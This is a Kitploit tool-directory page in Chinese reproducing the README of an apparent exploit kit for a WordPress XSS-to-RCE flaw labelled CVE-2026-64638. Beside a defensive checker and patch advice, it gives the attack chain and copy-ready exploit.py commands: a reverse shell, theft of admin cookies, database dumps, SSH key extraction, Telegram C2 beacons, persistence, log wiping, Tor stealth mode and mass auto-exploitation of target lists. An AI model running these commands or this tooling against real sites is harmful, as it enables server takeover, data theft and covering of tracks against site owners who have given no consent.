Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-64638-PoC-Exploit — 🛡️ CVE-2026-64638 - WordPress 安全评估套件(CVSS 8.9)| WordPress 4.7.0-7.0.2 渗透测试工具包。包含漏洞评估与高级分析模块。🐍 安全检测与利用,2 种模式。高级蓝队与红队最佳 2026-64638 工具包,仅限授权使用。请保持合法 <3zd | Kitploit
工具/GitHubGitHub/tc4dy/cve-2026-64638-poc-exploit
权限提升漏洞扫描器内存取证持久化机制漏洞利用Web应用程序漏洞利用后渗透利用渗透测试命令与控制

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
GitHubtc4dy/cve-2026-64638-poc-exploit

CVE-2026-64638-PoC-Exploit

🛡️ CVE-2026-64638 - WordPress 安全评估套件(CVSS 8.9)| WordPress 4.7.0-7.0.2 渗透测试工具包。包含漏洞评估与高级分析模块。🐍 安全检测与利用,2 种模式。高级蓝队与红队最佳 2026-64638 工具包,仅限授权使用。请保持合法 <3zd

查看仓库
181个月前尚未审核

CVE PoC

🌀 CVE‑2026‑64638 – WordPress XSS2Shell 安全套件

Python 3.8+ CVSS Author WordPress

⚠️ 仅供道德使用 – 仅限授权安全测试
本仓库提供的工具仅供授权安全专业人员、蓝队和渗透测试人员使用。
未经授权访问计算机系统在 CFAA(美国)、《计算机滥用法》(英国)、TCK 243/244(土耳其)以及全球类似法律 下均属违法行为。


📖 漏洞概述

CVE‑2026‑64638 是 WordPress 核心版本 4.7.0 至 7.0.2 中存在的一个严重的预认证反射型 XSS 漏洞,攻击者可借助应用程序密码(Application Password)功能将 XSS 攻击升级为完全远程代码执行(RCE)。

漏洞原理

  1. 解析器差异 – PHP 的 strip_tags() 与 WordPress 的 wp_kses_post() 对 HTML 标签的解析方式不同,导致恶意输入能够绕过净化检查。
  2. 反射型 XSS – 攻击者将特制 payload 注入登录表单(wp-login.php)。登录失败时,payload 被反射回来并在受害者浏览器中执行。
  3. 应用程序密码滥用 – 注入的 JavaScript 通过 WordPress REST API 自动生成应用程序密码,并将其外泄给攻击者。
  4. 插件上传(RCE) – 攻击者利用捕获的应用程序密码认证到管理后台,上传包含 Web Shell 的恶意插件。
  5. 系统完全沦陷 – Web Shell 提供系统命令执行能力,可实现反弹 Shell、持久化、横向移动和完全接管服务器。

受影响版本

  • WordPress 4.7.0 – 7.0.2 – 存在漏洞
  • WordPress 7.0.3 及更高版本 – 已修复
  • 安全更新已向后移植到所有受维护的分支

修复方案

  • 升级至 WordPress 7.0.3 或更高版本。
  • 如果无法升级,可禁用应用程序密码功能作为临时缓解措施。

🧰 工具

工具用途适用对象
exploit.py完整利用工具包,支持反弹 Shell、持久化、C2、权限提升、内存取证、数据库导出、SSH 密钥提取和批量扫描。红队 / 授权渗透测试人员
safecheck.py非侵入式漏洞检查器,可检测 XSS 反射并评估安全态势,无需执行任何恶意 payload。可生成详细报告。蓝队 / 安全审计人员

📊 功能对比


🎯 用例摘要


⚙️ 安装

root@kitploit:~
git clone https://github.com/tc4dy/CVE-2026-64638-PoC-Exploit
cd CVE-2026-64638-PoC-Exploit
pip install -r requirements.txt

requirements.txt

root@kitploit:~
requests
urllib3
#ops
pymysql
mysql-connector-python
PySocks
requests[socks]

📋 参数

exploit.py 参数

safecheck.py 参数


💥 使用场景


📊 交互式 Shell 命令


🧪 端点与 API 用法

端点用途
/wp-login.php登录页面 – XSS 注入点
/wp-admin/authorize-application.php应用程序密码生成

🛡️ 负责任使用

  • 仅对您拥有或已获得明确书面授权测试的系统使用这些工具。
  • 未经授权访问是非法且不道德的行为。
  • 作者不对任何滥用行为负责。
  • 始终遵守您所在国家的法律法规。

本软件仅供教育目的和授权安全测试使用。

法律合规

下载工具
功能exploit.pysafecheck.py
漏洞检测✅✅
WordPress 版本检测✅✅
XSS 反射检测✅✅
应用程序密码捕获✅❌
插件上传(RCE)✅❌
反弹 Shell✅❌
C2 信标(HTTP/DNS/Telegram)✅❌
权限提升✅❌
内存取证✅❌
数据库导出✅❌
SSH 密钥提取✅❌
持久化方法✅❌
安全响应头审计❌✅
配置文件暴露检测❌✅
目录列表检测❌✅
phpinfo 暴露检测❌✅
批量扫描✅✅
代理支持✅✅
Tor 支持✅✅
Ngrok 隧道✅❌
交互式 Shell✅❌
非侵入式(安全)模式❌✅
JSON / 报告输出✅✅
场景推荐工具
蓝队 – 验证您的 WordPress 安装是否存在漏洞safecheck.py
安全审计 – 非侵入式漏洞评估safecheck.py
红队 – 授权渗透测试与完整利用exploit.py
漏洞赏金 – 负责任披露测试safecheck.py
批量扫描 – 检查多个目标是否存在漏洞exploit.py 或 safecheck.py
应急响应 – 检查系统是否已被入侵safecheck.py
高级后渗透 – 持久化、C2、取证exploit.py
参数说明
-t, --target目标 WordPress URL(例如 https://wordpress-site.com)
-l, --list包含目标列表的文件(每行一个),用于批量扫描
--lhost反弹 Shell 回连的本地 IP 地址
--lport反弹 Shell 的本地端口(默认:4444)
--proxyHTTP/HTTPS 代理(例如 http://127.0.0.1:8080)
--timeout请求超时时间(秒)(默认:10)
--retry重试次数(默认:3)
--threads批量扫描的线程数(默认:5)
--exploit批量扫描期间自动利用存在漏洞的目标
--ngrok-token用于外部隧道的 Ngrok 认证令牌
--payload-typeXSS payload 类型:reflected、dom_based、waf_bypass、case_manipulation、double_encoded
--session-hijack启用会话劫持(窃取管理员 Cookie)
--dump-db导出 WordPress 数据库(需要 pymysql)
--extract-ssh从目标系统提取 SSH 密钥
--tor通过 Tor 路由流量(socks5h://127.0.0.1:9050)
--stealth启用隐身模式(伪造请求头、延迟请求)
--no-cleanup利用完成后跳过日志清理
--ssl-verify验证 SSL 证书
--c2-typeC2 类型:http、dns、telegram
--c2-serverC2 服务器 URL 或 Telegram 机器人令牌
--auto-priv-esc获得 Shell 后自动权限提升
--memory-forensics启用内存取证模块
-v, --verbose详细输出
-q, --quiet安静模式(最少输出)
参数说明
-t, --target目标 WordPress URL(例如 https://wordpress-site.com)
-l, --list包含目标列表的文件(每行一个),用于批量扫描
--timeout请求超时时间(秒)(默认:10)
--retry重试次数(默认:3)
--threads批量扫描的线程数(默认:5)
--proxyHTTP/HTTPS 代理(例如 http://127.0.0.1:8080)
--tor通过 Tor 路由流量(socks5h://127.0.0.1:9050)
--ssl-verify验证 SSL 证书
--output输出 JSON 报告文件
-v, --verbose详细输出
-q, --quiet安静模式(最少输出)
#场景命令
1快速漏洞检查python safecheck.py -t https://wordpress-site.com
2带报告的详细扫描python safecheck.py -t https://wordpress-site.com --output report.json -v
3带反弹 Shell 的完整利用python exploit.py -t https://wordpress-site.com --lhost 192.168.1.100 --exploit
4使用自定义 XSS payloadpython exploit.py -t https://wordpress-site.com --payload-type waf_bypass
5会话劫持(窃取管理员 Cookie)python exploit.py -t https://wordpress-site.com --session-hijack
6导出 WordPress 数据库python exploit.py -t https://wordpress-site.com --dump-db
7提取 SSH 密钥python exploit.py -t https://wordpress-site.com --extract-ssh
8使用 Tor 保持匿名python exploit.py -t https://wordpress-site.com --tor --stealth
9通过 Telegram 进行 C2 信标通信python exploit.py -t https://wordpress-site.com --c2-type telegram --c2-server "https://api.telegram.org/botTOKEN/chat_id"
10从文件批量扫描python exploit.py -l targets.txt --threads 10 --exploit
11获得 Shell 后进行内存取证python exploit.py -t https://wordpress-site.com --memory-forensics
12自动权限提升python exploit.py -t https://wordpress-site.com --auto-priv-esc
13交互式 Shellpython exploit.py -t https://wordpress-site.com -i
14Ngrok 隧道python exploit.py -t https://wordpress-site.com --ngrok-token YOUR_TOKEN
命令说明
reverse启动反弹 Shell 监听器
persist应用持久化方法(cron、systemd、rc.local、SSH、WP)
clean清理系统日志和历史记录
dumpdb导出 WordPress 数据库
ssh提取 SSH 密钥
priv自动权限提升
mem运行内存取证
c2显示 C2 状态
c2task检查 C2 任务
exit退出交互式 Shell
/wp-admin/update.php?action=upload-plugin
插件上传(RCE)
/wp-content/plugins/{slug}/{slug}.phpWeb Shell 执行
国家相关法律
美国《计算机欺诈和滥用法》(CFAA)– 18 U.S.C. § 1030
英国《计算机滥用法》1990
土耳其TCK 243(未经授权访问)、TCK 244(干扰系统)
德国StGB § 202a(数据间谍罪)、§ 202b(数据拦截罪)
法国《戈德弗兰法》(Loi Godfrain)– 第 323-1 条
澳大利亚《网络犯罪法》2001
加拿大《刑法典》– 第 342.1 条
印度《信息技术法》2000 – 第 43、66 条
日本《禁止未经授权计算机访问法》